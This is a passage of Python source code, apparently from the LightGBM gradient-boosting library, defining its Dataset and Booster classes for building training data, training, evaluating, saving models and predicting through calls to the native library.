feature_name='auto', categorical_feature='auto', params=None,
free_raw_data=True):
"""
Parameters
----------
data : string/numpy array/scipy.sparse
Data source of Dataset.
When data type is string, it represents the path of txt file
label : list or numpy 1-D array, optional
Label of the data
max_bin : int, required
Max number of discrete bin for features
reference : Other Dataset, optional
            If this is a validation Dataset, the training data should be used as reference.
weight : list or numpy 1-D array , optional
Weight for each instance.
group : list or numpy 1-D array , optional
Group/query size for dataset
silent : boolean, optional
Whether print messages during construction
feature_name : list of str, or 'auto'
Feature names
If 'auto' and data is pandas DataFrame, use data columns name
categorical_feature : list of str or int, or 'auto'
Categorical features,
type int represents index,
type str represents feature names (need to specify feature_name as well)
If 'auto' and data is pandas DataFrame, use pandas categorical columns
params: dict, optional
Other parameters
free_raw_data: Bool
            True if the raw data should be freed after constructing the inner Dataset.
"""
self.handle = None
self.data = data
self.label = label
self.max_bin = max_bin
self.reference = reference
self.weight = weight
self.group = group
self.silent = silent
self.feature_name = feature_name
self.categorical_feature = categorical_feature
self.params = params
self.free_raw_data = free_raw_data
self.used_indices = None
self._predictor = None
self.pandas_categorical = None
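    # A minimal construction sketch (hedged; X, y, X_valid and y_valid are
    # illustrative numpy arrays, not part of this module):
    #
    #     train_data = Dataset(X, label=y, free_raw_data=False)
    #     valid_data = train_data.create_valid(X_valid, label=y_valid)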
def __del__(self):
self._free_handle()
def _free_handle(self):
if self.handle is not None:
_safe_call(_LIB.LGBM_DatasetFree(self.handle))
self.handle = None
def _lazy_init(self, data, label=None, max_bin=255, reference=None,
weight=None, group=None, predictor=None,
silent=False, feature_name='auto',
categorical_feature='auto', params=None):
if data is None:
self.handle = None
return
data, feature_name, categorical_feature, self.pandas_categorical = _data_from_pandas(data, feature_name, categorical_feature, self.pandas_categorical)
label = _label_from_pandas(label)
self.data_has_header = False
"""process for args"""
params = {} if params is None else params
self.max_bin = max_bin
self.predictor = predictor
params["max_bin"] = max_bin
if silent:
params["verbose"] = 0
elif "verbose" not in params:
params["verbose"] = 1
"""get categorical features"""
if categorical_feature is not None:
categorical_indices = set()
feature_dict = {}
if feature_name is not None:
feature_dict = {name: i for i, name in enumerate(feature_name)}
for name in categorical_feature:
if isinstance(name, string_type) and name in feature_dict:
categorical_indices.add(feature_dict[name])
elif isinstance(name, integer_types):
categorical_indices.add(name)
else:
raise TypeError("Wrong type({}) or unknown name({}) in categorical_feature"
.format(type(name).__name__, name))
params['categorical_column'] = sorted(categorical_indices)
params_str = param_dict_to_str(params)
"""process for reference dataset"""
ref_dataset = None
if isinstance(reference, Dataset):
ref_dataset = reference.construct().handle
elif reference is not None:
raise TypeError('Reference dataset should be None or dataset instance')
"""start construct data"""
if isinstance(data, string_type):
"""check data has header or not"""
if str(params.get("has_header", "")).lower() == "true" \
or str(params.get("header", "")).lower() == "true":
self.data_has_header = True
self.handle = ctypes.c_void_p()
_safe_call(_LIB.LGBM_DatasetCreateFromFile(
c_str(data),
c_str(params_str),
ref_dataset,
ctypes.byref(self.handle)))
elif isinstance(data, scipy.sparse.csr_matrix):
self.__init_from_csr(data, params_str, ref_dataset)
elif isinstance(data, scipy.sparse.csc_matrix):
self.__init_from_csc(data, params_str, ref_dataset)
elif isinstance(data, np.ndarray):
self.__init_from_np2d(data, params_str, ref_dataset)
else:
try:
csr = scipy.sparse.csr_matrix(data)
self.__init_from_csr(csr, params_str, ref_dataset)
except:
raise TypeError('Cannot initialize Dataset from {}'.format(type(data).__name__))
if label is not None:
self.set_label(label)
if self.get_label() is None:
raise ValueError("Label should not be None")
if weight is not None:
self.set_weight(weight)
if group is not None:
self.set_group(group)
# load init score
if isinstance(self.predictor, _InnerPredictor):
init_score = self.predictor.predict(data,
raw_score=True,
data_has_header=self.data_has_header,
is_reshape=False)
if self.predictor.num_class > 1:
# need re group init score
new_init_score = np.zeros(init_score.size, dtype=np.float32)
num_data = self.num_data()
for i in range_(num_data):
for j in range_(self.predictor.num_class):
new_init_score[j * num_data + i] = init_score[i * self.predictor.num_class + j]
init_score = new_init_score
self.set_init_score(init_score)
elif self.predictor is not None:
raise TypeError('wrong predictor type {}'.format(type(self.predictor).__name__))
# set feature names
self.set_feature_name(feature_name)
def __init_from_np2d(self, mat, params_str, ref_dataset):
"""
Initialize data from a 2-D numpy matrix.
"""
if len(mat.shape) != 2:
raise ValueError('Input numpy.ndarray must be 2 dimensional')
self.handle = ctypes.c_void_p()
if mat.dtype == np.float32 or mat.dtype == np.float64:
data = np.array(mat.reshape(mat.size), dtype=mat.dtype, copy=False)
else:
"""change non-float data to float data, need to copy"""
data = np.array(mat.reshape(mat.size), dtype=np.float32)
ptr_data, type_ptr_data = c_float_array(data)
_safe_call(_LIB.LGBM_DatasetCreateFromMat(
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int(mat.shape[0]),
ctypes.c_int(mat.shape[1]),
ctypes.c_int(C_API_IS_ROW_MAJOR),
c_str(params_str),
ref_dataset,
ctypes.byref(self.handle)))
def __init_from_csr(self, csr, params_str, ref_dataset):
"""
Initialize data from a CSR matrix.
"""
if len(csr.indices) != len(csr.data):
raise ValueError('Length mismatch: {} vs {}'.format(len(csr.indices), len(csr.data)))
self.handle = ctypes.c_void_p()
ptr_indptr, type_ptr_indptr = c_int_array(csr.indptr)
ptr_data, type_ptr_data = c_float_array(csr.data)
_safe_call(_LIB.LGBM_DatasetCreateFromCSR(
ptr_indptr,
ctypes.c_int(type_ptr_indptr),
csr.indices.ctypes.data_as(ctypes.POINTER(ctypes.c_int32)),
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int64(len(csr.indptr)),
ctypes.c_int64(len(csr.data)),
ctypes.c_int64(csr.shape[1]),
c_str(params_str),
ref_dataset,
ctypes.byref(self.handle)))
def __init_from_csc(self, csc, params_str, ref_dataset):
"""
Initialize data from a csc matrix.
"""
if len(csc.indices) != len(csc.data):
raise ValueError('Length mismatch: {} vs {}'.format(len(csc.indices), len(csc.data)))
self.handle = ctypes.c_void_p()
ptr_indptr, type_ptr_indptr = c_int_array(csc.indptr)
ptr_data, type_ptr_data = c_float_array(csc.data)
_safe_call(_LIB.LGBM_DatasetCreateFromCSC(
ptr_indptr,
ctypes.c_int(type_ptr_indptr),
csc.indices.ctypes.data_as(ctypes.POINTER(ctypes.c_int32)),
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int64(len(csc.indptr)),
ctypes.c_int64(len(csc.data)),
ctypes.c_int64(csc.shape[0]),
c_str(params_str),
ref_dataset,
ctypes.byref(self.handle)))
def construct(self):
"""Lazy init"""
if self.handle is None:
if self.reference is not None:
if self.used_indices is None:
"""create valid"""
self._lazy_init(self.data, label=self.label, max_bin=self.max_bin, reference=self.reference,
weight=self.weight, group=self.group, predictor=self._predictor,
silent=self.silent, params=self.params)
else:
"""construct subset"""
used_indices = list_to_1d_numpy(self.used_indices, np.int32, name='used_indices')
self.handle = ctypes.c_void_p()
params_str = param_dict_to_str(self.params)
_safe_call(_LIB.LGBM_DatasetGetSubset(
self.reference.construct().handle,
used_indices.ctypes.data_as(ctypes.POINTER(ctypes.c_int32)),
ctypes.c_int(used_indices.shape[0]),
c_str(params_str),
ctypes.byref(self.handle)))
if self.get_label() is None:
raise ValueError("Label should not be None.")
else:
"""create train"""
self._lazy_init(self.data, label=self.label, max_bin=self.max_bin,
weight=self.weight, group=self.group, predictor=self._predictor,
silent=self.silent, feature_name=self.feature_name,
categorical_feature=self.categorical_feature, params=self.params)
if self.free_raw_data:
self.data = None
return self
def create_valid(self, data, label=None, weight=None, group=None,
silent=False, params=None):
"""
Create validation data align with current dataset
Parameters
----------
data : string/numpy array/scipy.sparse
Data source of Dataset.
When data type is string, it represents the path of txt file
label : list or numpy 1-D array, optional
Label of the training data.
weight : list or numpy 1-D array , optional
Weight for each instance.
group : list or numpy 1-D array , optional
Group/query size for dataset
silent : boolean, optional
Whether print messages during construction
params: dict, optional
Other parameters
"""
ret = Dataset(data, label=label, max_bin=self.max_bin, reference=self,
weight=weight, group=group, silent=silent, params=params,
free_raw_data=self.free_raw_data)
ret._predictor = self._predictor
ret.pandas_categorical = self.pandas_categorical
return ret
def subset(self, used_indices, params=None):
"""
Get subset of current dataset
Parameters
----------
used_indices : list of int
Used indices of this subset
params : dict
Other parameters
"""
ret = Dataset(None, reference=self, feature_name=self.feature_name,
categorical_feature=self.categorical_feature, params=params)
ret._predictor = self._predictor
ret.pandas_categorical = self.pandas_categorical
ret.used_indices = used_indices
return ret
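    # A minimal subset sketch (hedged; indices are illustrative):
    #
    #     fold = train_data.subset([0, 2, 5])   # lazy view over rows 0, 2 and 5 of the parent Dataset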
def save_binary(self, filename):
"""
Save Dataset to binary file
Parameters
----------
filename : string
Name of the output file.
"""
_safe_call(_LIB.LGBM_DatasetSaveBinary(
self.construct().handle,
c_str(filename)))
def _update_params(self, params):
if not self.params:
self.params = params
else:
self.params.update(params)
def set_field(self, field_name, data):
"""Set property into the Dataset.
Parameters
----------
field_name: str
The field name of the information
data: numpy array or list or None
            The array of data to be set
"""
if self.handle is None:
raise Exception("Cannot set %s before construct dataset" % field_name)
if data is None:
"""set to None"""
_safe_call(_LIB.LGBM_DatasetSetField(
self.handle,
c_str(field_name),
None,
ctypes.c_int(0),
ctypes.c_int(FIELD_TYPE_MAPPER[field_name])))
return
dtype = np.float32
if field_name == 'group':
dtype = np.int32
elif field_name == 'init_score':
dtype = np.float64
data = list_to_1d_numpy(data, dtype, name=field_name)
if data.dtype == np.float32:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_float))
type_data = C_API_DTYPE_FLOAT32
elif data.dtype == np.float64:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_double))
type_data = C_API_DTYPE_FLOAT64
elif data.dtype == np.int32:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_int32))
type_data = C_API_DTYPE_INT32
else:
raise TypeError("Excepted np.float32/64 or np.int32, meet type({})".format(data.dtype))
if type_data != FIELD_TYPE_MAPPER[field_name]:
raise TypeError("Input type error for set_field")
_safe_call(_LIB.LGBM_DatasetSetField(
self.handle,
c_str(field_name),
ptr_data,
ctypes.c_int(len(data)),
ctypes.c_int(type_data)))
def get_field(self, field_name):
"""Get property from the Dataset.
Parameters
----------
field_name: str
The field name of the information
Returns
-------
info : array
A numpy array of information of the data
"""
if self.handle is None:
raise Exception("Cannot get %s before construct dataset" % field_name)
tmp_out_len = ctypes.c_int()
out_type = ctypes.c_int()
ret = ctypes.POINTER(ctypes.c_void_p)()
_safe_call(_LIB.LGBM_DatasetGetField(
self.handle,
c_str(field_name),
ctypes.byref(tmp_out_len),
ctypes.byref(ret),
ctypes.byref(out_type)))
if out_type.value != FIELD_TYPE_MAPPER[field_name]:
raise TypeError("Return type error for get_field")
if tmp_out_len.value == 0:
return None
if out_type.value == C_API_DTYPE_INT32:
return cint32_array_to_numpy(ctypes.cast(ret, ctypes.POINTER(ctypes.c_int32)), tmp_out_len.value)
elif out_type.value == C_API_DTYPE_FLOAT32:
return cfloat32_array_to_numpy(ctypes.cast(ret, ctypes.POINTER(ctypes.c_float)), tmp_out_len.value)
elif out_type.value == C_API_DTYPE_FLOAT64:
return cfloat64_array_to_numpy(ctypes.cast(ret, ctypes.POINTER(ctypes.c_double)), tmp_out_len.value)
else:
raise TypeError("Unknown type")
def set_categorical_feature(self, categorical_feature):
"""
Set categorical features
Parameters
----------
categorical_feature : list of int or str
Name/index of categorical features
"""
if self.categorical_feature == categorical_feature:
return
if self.data is not None:
self.categorical_feature = categorical_feature
self._free_handle()
else:
raise LightGBMError("Cannot set categorical feature after freed raw data, set free_raw_data=False when construct Dataset to avoid this.")
def _set_predictor(self, predictor):
"""
        Set predictor for continued training. It is not recommended for users to call this function directly.
Please set init_model in engine.train or engine.cv
"""
if predictor is self._predictor:
return
if self.data is not None:
self._predictor = predictor
self._free_handle()
else:
raise LightGBMError("Cannot set predictor after freed raw data, set free_raw_data=False when construct Dataset to avoid this.")
def set_reference(self, reference):
"""
Set reference dataset
Parameters
----------
reference : Dataset
            Will use reference as a template to construct the current Dataset.
"""
self.set_categorical_feature(reference.categorical_feature)
self.set_feature_name(reference.feature_name)
self._set_predictor(reference._predictor)
if self.reference is reference:
return
if self.data is not None:
self.reference = reference
self._free_handle()
else:
raise LightGBMError("Cannot set reference after freed raw data, set free_raw_data=False when construct Dataset to avoid this.")
def set_feature_name(self, feature_name):
"""
Set feature name
Parameters
----------
feature_name : list of str
Feature names
"""
self.feature_name = feature_name
if self.handle is not None and feature_name is not None and feature_name != 'auto':
if len(feature_name) != self.num_feature():
raise ValueError("Length of feature_name({}) and num_feature({}) don't match".format(len(feature_name), self.num_feature()))
c_feature_name = [c_str(name) for name in feature_name]
_safe_call(_LIB.LGBM_DatasetSetFeatureNames(
self.handle,
c_array(ctypes.c_char_p, c_feature_name),
ctypes.c_int(len(feature_name))))
def set_label(self, label):
"""
Set label of Dataset
Parameters
----------
label: numpy array or list or None
The label information to be set into Dataset
"""
self.label = label
if self.handle is not None:
label = list_to_1d_numpy(label, name='label')
self.set_field('label', label)
def set_weight(self, weight):
"""
Set weight of each instance.
Parameters
----------
weight : numpy array or list or None
Weight for each data point
"""
self.weight = weight
if self.handle is not None and weight is not None:
weight = list_to_1d_numpy(weight, name='weight')
self.set_field('weight', weight)
def set_init_score(self, init_score):
"""
Set init score of booster to start from.
Parameters
----------
init_score: numpy array or list or None
Init score for booster
"""
self.init_score = init_score
if self.handle is not None and init_score is not None:
init_score = list_to_1d_numpy(init_score, np.float64, name='init_score')
self.set_field('init_score', init_score)
def set_group(self, group):
"""
Set group size of Dataset (used for ranking).
Parameters
----------
group : numpy array or list or None
Group size of each group
"""
self.group = group
if self.handle is not None and group is not None:
group = list_to_1d_numpy(group, np.int32, name='group')
self.set_field('group', group)
def get_label(self):
"""
Get the label of the Dataset.
Returns
-------
label : array
"""
if self.label is None and self.handle is not None:
self.label = self.get_field('label')
return self.label
def get_weight(self):
"""
Get the weight of the Dataset.
Returns
-------
weight : array
"""
if self.weight is None and self.handle is not None:
self.weight = self.get_field('weight')
return self.weight
def get_init_score(self):
"""
Get the initial score of the Dataset.
Returns
-------
init_score : array
"""
if self.init_score is None and self.handle is not None:
self.init_score = self.get_field('init_score')
return self.init_score
def get_group(self):
"""
        Get the group sizes of the Dataset.
        Returns
        -------
        group : array
"""
if self.group is None and self.handle is not None:
self.group = self.get_field('group')
if self.group is not None:
# group data from LightGBM is boundaries data, need to convert to group size
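                # e.g. boundaries [0, 10, 25, 40] become group sizes [10, 15, 15]
                # (illustrative values)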
new_group = []
for i in range_(len(self.group) - 1):
new_group.append(self.group[i + 1] - self.group[i])
self.group = new_group
return self.group
def num_data(self):
"""
Get the number of rows in the Dataset.
Returns
-------
number of rows : int
"""
if self.handle is not None:
ret = ctypes.c_int()
_safe_call(_LIB.LGBM_DatasetGetNumData(self.handle,
ctypes.byref(ret)))
return ret.value
else:
raise LightGBMError("Cannot get num_data before construct dataset")
def num_feature(self):
"""
Get the number of columns (features) in the Dataset.
Returns
-------
number of columns : int
"""
if self.handle is not None:
ret = ctypes.c_int()
_safe_call(_LIB.LGBM_DatasetGetNumFeature(self.handle,
ctypes.byref(ret)))
return ret.value
else:
raise LightGBMError("Cannot get num_feature before construct dataset")
class Booster(object):
""""Booster in LightGBM."""
def __init__(self, params=None, train_set=None, model_file=None, silent=False):
"""
Initialize the Booster.
Parameters
----------
params : dict
Parameters for boosters.
train_set : Dataset
Training dataset
model_file : string
Path to the model file.
silent : boolean, optional
Whether print messages during construction
"""
self.handle = ctypes.c_void_p()
self.__need_reload_eval_info = True
self.__train_data_name = "training"
self.__attr = {}
self.best_iteration = -1
params = {} if params is None else params
if silent:
params["verbose"] = 0
elif "verbose" not in params:
params["verbose"] = 1
if train_set is not None:
"""Training task"""
if not isinstance(train_set, Dataset):
raise TypeError('Training data should be Dataset instance, met {}'.format(type(train_set).__name__))
params_str = param_dict_to_str(params)
"""construct booster object"""
_safe_call(_LIB.LGBM_BoosterCreate(
train_set.construct().handle,
c_str(params_str),
ctypes.byref(self.handle)))
"""save reference to data"""
self.train_set = train_set
self.valid_sets = []
self.name_valid_sets = []
self.__num_dataset = 1
self.__init_predictor = train_set._predictor
if self.__init_predictor is not None:
_safe_call(_LIB.LGBM_BoosterMerge(
self.handle,
self.__init_predictor.handle))
out_num_class = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetNumClasses(
self.handle,
ctypes.byref(out_num_class)))
self.__num_class = out_num_class.value
"""buffer for inner predict"""
self.__inner_predict_buffer = [None]
self.__is_predicted_cur_iter = [False]
self.__get_eval_info()
self.pandas_categorical = train_set.pandas_categorical
elif model_file is not None:
"""Prediction task"""
out_num_iterations = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterCreateFromModelfile(
c_str(model_file),
ctypes.byref(out_num_iterations),
ctypes.byref(self.handle)))
out_num_class = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetNumClasses(
self.handle,
ctypes.byref(out_num_class)))
self.__num_class = out_num_class.value
self.pandas_categorical = _load_pandas_categorical(model_file)
elif 'model_str' in params:
self.__load_model_from_string(params['model_str'])
else:
raise TypeError('Need at least one training dataset or model file to create booster instance')
def __del__(self):
if self.handle is not None:
_safe_call(_LIB.LGBM_BoosterFree(self.handle))
def __copy__(self):
return self.__deepcopy__(None)
def __deepcopy__(self, _):
model_str = self.__save_model_to_string()
booster = Booster({'model_str': model_str})
booster.pandas_categorical = self.pandas_categorical
return booster
def __getstate__(self):
this = self.__dict__.copy()
handle = this['handle']
this.pop('train_set', None)
this.pop('valid_sets', None)
if handle is not None:
this["handle"] = self.__save_model_to_string()
return this
def __setstate__(self, state):
model_str = state.get('handle', None)
if model_str is not None:
handle = ctypes.c_void_p()
out_num_iterations = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterLoadModelFromString(
c_str(model_str),
ctypes.byref(out_num_iterations),
ctypes.byref(handle)))
state['handle'] = handle
self.__dict__.update(state)
def set_train_data_name(self, name):
self.__train_data_name = name
def add_valid(self, data, name):
"""
        Add a validation dataset.
Parameters
----------
data : Dataset
Validation data
name : String
Name of validation data
"""
if not isinstance(data, Dataset):
raise TypeError('valid data should be Dataset instance, met {}'.format(type(data).__name__))
if data._predictor is not self.__init_predictor:
raise LightGBMError("Add validation data failed, you should use same predictor for these data")
_safe_call(_LIB.LGBM_BoosterAddValidData(
self.handle,
data.construct().handle))
self.valid_sets.append(data)
self.name_valid_sets.append(name)
self.__num_dataset += 1
self.__inner_predict_buffer.append(None)
self.__is_predicted_cur_iter.append(False)
def reset_parameter(self, params):
"""
Reset parameters for booster
Parameters
----------
params : dict
New parameters for boosters
"""
if 'metric' in params:
self.__need_reload_eval_info = True
params_str = param_dict_to_str(params)
if params_str:
_safe_call(_LIB.LGBM_BoosterResetParameter(
self.handle,
c_str(params_str)))
def update(self, train_set=None, fobj=None):
"""
Update for one iteration
        Note: for multi-class task, the score is grouped by class_id first, then by row_id.
        If you want to get the i-th row score in the j-th class, the access way is score[j * num_data + i],
        and you should group grad and hess in this way as well.
Parameters
----------
train_set :
Training data, None means use last training data
fobj : function
Customized objective function.
Returns
-------
is_finished, bool
"""
"""need reset training data"""
if train_set is not None and train_set is not self.train_set:
if not isinstance(train_set, Dataset):
raise TypeError('Training data should be Dataset instance, met {}'.format(type(train_set).__name__))
if train_set._predictor is not self.__init_predictor:
raise LightGBMError("Replace training data failed, you should use same predictor for these data")
self.train_set = train_set
_safe_call(_LIB.LGBM_BoosterResetTrainingData(
self.handle,
self.train_set.construct().handle))
self.__inner_predict_buffer[0] = None
is_finished = ctypes.c_int(0)
if fobj is None:
_safe_call(_LIB.LGBM_BoosterUpdateOneIter(
self.handle,
ctypes.byref(is_finished)))
self.__is_predicted_cur_iter = [False for _ in range_(self.__num_dataset)]
return is_finished.value == 1
else:
grad, hess = fobj(self.__inner_predict(0), self.train_set)
return self.__boost(grad, hess)
def __boost(self, grad, hess):
"""
Boost the booster for one iteration, with customized gradient statistics.
        Note: for multi-class tasks the score is grouped by class_id first, then by row_id.
              To get the score of the i-th row in the j-th class, use score[j * num_data + i];
              grad and hess should be grouped the same way.
Parameters
----------
grad : 1d numpy or 1d list
The first order of gradient.
hess : 1d numpy or 1d list
The second order of gradient.
Returns
-------
        is_finished : bool
"""
grad = list_to_1d_numpy(grad, name='gradient')
hess = list_to_1d_numpy(hess, name='hessian')
if len(grad) != len(hess):
raise ValueError("Lengths of gradient({}) and hessian({}) don't match".format(len(grad), len(hess)))
is_finished = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterUpdateOneIterCustom(
self.handle,
grad.ctypes.data_as(ctypes.POINTER(ctypes.c_float)),
hess.ctypes.data_as(ctypes.POINTER(ctypes.c_float)),
ctypes.byref(is_finished)))
self.__is_predicted_cur_iter = [False for _ in range_(self.__num_dataset)]
return is_finished.value == 1
def rollback_one_iter(self):
"""
Rollback one iteration
"""
_safe_call(_LIB.LGBM_BoosterRollbackOneIter(
self.handle))
self.__is_predicted_cur_iter = [False for _ in range_(self.__num_dataset)]
def current_iteration(self):
out_cur_iter = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetCurrentIteration(
self.handle,
ctypes.byref(out_cur_iter)))
return out_cur_iter.value
def eval(self, data, name, feval=None):
"""
Evaluate for data
Parameters
----------
data : Dataset object
        name : str
            Name of the data
feval : function
Custom evaluation function.
Returns
-------
result: list
Evaluation result list.
"""
if not isinstance(data, Dataset):
raise TypeError("Can only eval for Dataset instance")
data_idx = -1
if data is self.train_set:
data_idx = 0
else:
for i in range_(len(self.valid_sets)):
if data is self.valid_sets[i]:
data_idx = i + 1
break
"""need to push new valid data"""
if data_idx == -1:
self.add_valid(data, name)
data_idx = self.__num_dataset - 1
return self.__inner_eval(name, data_idx, feval)
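    # A sketch of a custom metric passed as ``feval`` (illustrative names,
    # ``numpy`` assumed imported as ``np``): it receives the inner predictions
    # and the Dataset being evaluated and returns a single
    # (eval_name, value, is_higher_better) tuple or a list of such tuples.
    #
    #     def mean_abs_error(preds, eval_data):
    #         labels = eval_data.get_label()
    #         return 'mae', float(np.mean(np.abs(preds - labels))), False
    #
    #     booster.eval(valid_ds, 'valid_0', feval=mean_abs_error)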
def eval_train(self, feval=None):
"""
Evaluate for training data
Parameters
----------
feval : function
Custom evaluation function.
Returns
-------
        result : list
Evaluation result list.
"""
return self.__inner_eval(self.__train_data_name, 0, feval)
def eval_valid(self, feval=None):
"""
Evaluate for validation data
Parameters
----------
feval : function
Custom evaluation function.
Returns
-------
        result : list
Evaluation result list.
"""
return [item for i in range_(1, self.__num_dataset)
for item in self.__inner_eval(self.name_valid_sets[i - 1], i, feval)]
def save_model(self, filename, num_iteration=-1):
"""
Save model of booster to file
Parameters
----------
filename : str
Filename to save
        num_iteration : int
            Number of iterations to save. <= 0 means save up to the best iteration (if it exists)
"""
if num_iteration <= 0:
num_iteration = self.best_iteration
_safe_call(_LIB.LGBM_BoosterSaveModel(
self.handle,
ctypes.c_int(num_iteration),
c_str(filename)))
_save_pandas_categorical(filename, self.pandas_categorical)
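    # A usage sketch mirroring the ``model_file`` branch of ``__init__`` above
    # ('model.txt' is an illustrative path): save the model, then rebuild a
    # Booster from the file later.
    #
    #     booster.save_model('model.txt')
    #     restored = Booster(model_file='model.txt')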
def __load_model_from_string(self, model_str):
"""[Private] Load model from string"""
out_num_iterations = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterLoadModelFromString(
c_str(model_str),
ctypes.byref(out_num_iterations),
ctypes.byref(self.handle)))
out_num_class = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetNumClasses(
self.handle,
ctypes.byref(out_num_class)))
self.__num_class = out_num_class.value
def __save_model_to_string(self, num_iteration=-1):
"""[Private] Save model to string"""
if num_iteration <= 0:
num_iteration = self.best_iteration
buffer_len = 1 << 20
tmp_out_len = ctypes.c_int(0)
string_buffer = ctypes.create_string_buffer(buffer_len)
ptr_string_buffer = ctypes.c_char_p(*[ctypes.addressof(string_buffer)])
_safe_call(_LIB.LGBM_BoosterSaveModelToString(
self.handle,
ctypes.c_int(num_iteration),
ctypes.c_int(buffer_len),
ctypes.byref(tmp_out_len),
ptr_string_buffer))
actual_len = tmp_out_len.value
        # if the buffer is not long enough, re-allocate it
if actual_len > buffer_len:
string_buffer = ctypes.create_string_buffer(actual_len)
ptr_string_buffer = ctypes.c_char_p(*[ctypes.addressof(string_buffer)])
_safe_call(_LIB.LGBM_BoosterSaveModelToString(
self.handle,
ctypes.c_int(num_iteration),
ctypes.c_int(actual_len),
ctypes.byref(tmp_out_len),
ptr_string_buffer))
return string_buffer.value.decode()
def dump_model(self, num_iteration=-1):
"""
Dump model to json format
Parameters
----------
        num_iteration : int
            Number of iterations to dump. <= 0 means dump up to the best iteration (if it exists)
Returns
-------
        JSON dict representation of the model
"""
if num_iteration <= 0:
num_iteration = self.best_iteration
buffer_len = 1 << 20
tmp_out_len = ctypes.c_int(0)
string_buffer = ctypes.create_string_buffer(buffer_len)
ptr_string_buffer = ctypes.c_char_p(*[ctypes.addressof(string_buffer)])
_safe_call(_LIB.LGBM_BoosterDumpModel(
self.handle,
ctypes.c_int(num_iteration),
ctypes.c_int(buffer_len),
ctypes.byref(tmp_out_len),
ptr_string_buffer))
actual_len = tmp_out_len.value
        # if the buffer is not long enough, re-allocate it
if actual_len > buffer_len:
string_buffer = ctypes.create_string_buffer(actual_len)
ptr_string_buffer = ctypes.c_char_p(*[ctypes.addressof(string_buffer)])
_safe_call(_LIB.LGBM_BoosterDumpModel(
self.handle,
ctypes.c_int(num_iteration),
ctypes.c_int(actual_len),
ctypes.byref(tmp_out_len),
ptr_string_buffer))
return json.loads(string_buffer.value.decode())
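    # A usage sketch: the returned dict can be inspected directly; the keys used
    # here are the same ones ``feature_importance`` below relies on.
    #
    #     dumped = booster.dump_model()
    #     num_features = dumped['max_feature_idx'] + 1
    #     num_trees = len(dumped['tree_info'])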
def predict(self, data, num_iteration=-1, raw_score=False, pred_leaf=False, data_has_header=False, is_reshape=True):
"""
Predict logic
Parameters
----------
        data : string/numpy array/scipy.sparse
            Data source for prediction.
            When data is a string, it is interpreted as the path of a txt file
        num_iteration : int
            Number of iterations used for prediction; <= 0 means predict with the best iteration (if it exists)
        raw_score : bool
            Whether to predict raw scores
        pred_leaf : bool
            Whether to predict leaf indices
        data_has_header : bool
            Whether the txt data file contains a header (only used for txt data)
        is_reshape : bool
            Whether to reshape the result to (nrow, ncol)
Returns
-------
Prediction result
"""
predictor = self._to_predictor()
if num_iteration <= 0:
num_iteration = self.best_iteration
return predictor.predict(data, num_iteration, raw_score, pred_leaf, data_has_header, is_reshape)
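    # A usage sketch (``X`` is an illustrative numpy array or file path with the
    # same feature layout as the training data):
    #
    #     preds = booster.predict(X, num_iteration=booster.best_iteration)
    #     raw = booster.predict(X, raw_score=True)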
def _to_predictor(self):
"""Convert to predictor"""
predictor = _InnerPredictor(booster_handle=self.handle)
predictor.pandas_categorical = self.pandas_categorical
return predictor
def feature_name(self):
"""
Get feature names.
Returns
-------
result : array
Array of feature names.
"""
out_num_feature = ctypes.c_int(0)
"""Get num of features"""
_safe_call(_LIB.LGBM_BoosterGetNumFeature(
self.handle,
ctypes.byref(out_num_feature)))
num_feature = out_num_feature.value
"""Get name of features"""
tmp_out_len = ctypes.c_int(0)
string_buffers = [ctypes.create_string_buffer(255) for i in range_(num_feature)]
ptr_string_buffers = (ctypes.c_char_p * num_feature)(*map(ctypes.addressof, string_buffers))
_safe_call(_LIB.LGBM_BoosterGetFeatureNames(
self.handle,
ctypes.byref(tmp_out_len),
ptr_string_buffers))
if num_feature != tmp_out_len.value:
raise ValueError("Length of feature names doesn't equal with num_feature")
return [string_buffers[i].value.decode() for i in range_(num_feature)]
def feature_importance(self, importance_type='split'):
"""
Get feature importances
Parameters
----------
importance_type : str, default "split"
How the importance is calculated: "split" or "gain"
"split" is the number of times a feature is used in a model
"gain" is the total gain of splits which use the feature
Returns
-------
result : array
Array of feature importances.
"""
if importance_type not in ["split", "gain"]:
raise KeyError("importance_type must be split or gain")
dump_model = self.dump_model()
ret = [0] * (dump_model["max_feature_idx"] + 1)
def dfs(root):
if "split_feature" in root:
if importance_type == 'split':
ret[root["split_feature"]] += 1
elif importance_type == 'gain':
ret[root["split_feature"]] += root["split_gain"]
dfs(root["left_child"])
dfs(root["right_child"])
for tree in dump_model["tree_info"]:
dfs(tree["tree_structure"])
return np.array(ret)
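    # A usage sketch contrasting the two importance types:
    #
    #     split_counts = booster.feature_importance(importance_type='split')
    #     total_gains = booster.feature_importance(importance_type='gain')
    #     for name, count in zip(booster.feature_name(), split_counts):
    #         print(name, count)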
def __inner_eval(self, data_name, data_idx, feval=None):
"""
        Evaluate training or validation data
"""
if data_idx >= self.__num_dataset:
raise ValueError("Data_idx should be smaller than number of dataset")
self.__get_eval_info()
ret = []
if self.__num_inner_eval > 0:
result = np.array([0.0 for _ in range_(self.__num_inner_eval)], dtype=np.float64)
tmp_out_len = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetEval(
self.handle,
ctypes.c_int(data_idx),
ctypes.byref(tmp_out_len),
result.ctypes.data_as(ctypes.POINTER(ctypes.c_double))))
if tmp_out_len.value != self.__num_inner_eval:
raise ValueError("Wrong length of eval results")
for i in range_(self.__num_inner_eval):
ret.append((data_name, self.__name_inner_eval[i], result[i], self.__higher_better_inner_eval[i]))
if feval is not None:
if data_idx == 0:
cur_data = self.train_set
else:
cur_data = self.valid_sets[data_idx - 1]
feval_ret = feval(self.__inner_predict(data_idx), cur_data)
if isinstance(feval_ret, list):
for eval_name, val, is_higher_better in feval_ret:
